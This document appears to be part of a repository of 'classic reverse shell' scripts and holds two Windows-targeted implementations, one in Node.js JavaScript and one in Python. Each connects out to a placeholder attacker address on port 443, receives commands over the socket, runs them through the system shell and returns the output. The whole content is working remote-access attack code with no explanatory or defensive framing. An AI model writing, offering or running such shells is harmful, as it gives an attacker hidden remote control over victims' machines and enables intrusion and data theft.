File: Clasic_Rever_Shell/JavaScript/Clasic1.js
// windows
javascript
import net from 'node:net';
import { exec } from 'node:child_process';

const LHOST = 'IP_ADDRESS';
const LPORT = 443;
const BUFFERR_SIZE = 1024;

const client = new net.Socket();

client.connect(LPORT, LHOST);

client.on('data', (data) => {
  try {
    const chunk = data.subarray(0, BUFFERR_SIZE);
    if (!chunk || chunk.length === 0) {
      client.end();
      return;
    }

    const command = chunk.toString('utf8').trim();

    if (command.length >= 0) {
      exec(command, { shell: true, encoding: 'buffer' }, (error, stdout, stderr) => {
        const output = error ? (error.stdout ?? stdout ?? stderr ?? Buffer.from('')) : stdout;
        client.write(output);
      });
    }
  } catch (error) {
    client.write(`error ${error}`);
  }
});

client.on('error', (error) => {
  try {
    client.write(`error ${error}`);
  } catch {
    // ignore
  }
});

client.on('close', () => {
  client.destroy();
});

File: Clasic_Rever_Shell/Python/Clasic1.py
# Windows
import socket as s
import subprocess as sp

LHOST = 'IP_ADDRESS'
LPORT = 443
BUFFERR_SIZE = 1024

client = s.socket(s.AF_INET, s.SOCK_STREAM)
client.connect((LHOST, LPORT))

while True:
    try:
        data = client.recv(BUFFERR_SIZE)
        if not data:
            break

        command = data.decode("utf-8").strip()

        if len(command) >= 0:
            try:
                output = sp.check_output(command, shell=True, stderr=sp.STDOUT)
            except sp.CalledProcessError as error:
                output = error.output

            client.send(output)
    except Exception as error:
        client.send(f"error {error}")
client.close()
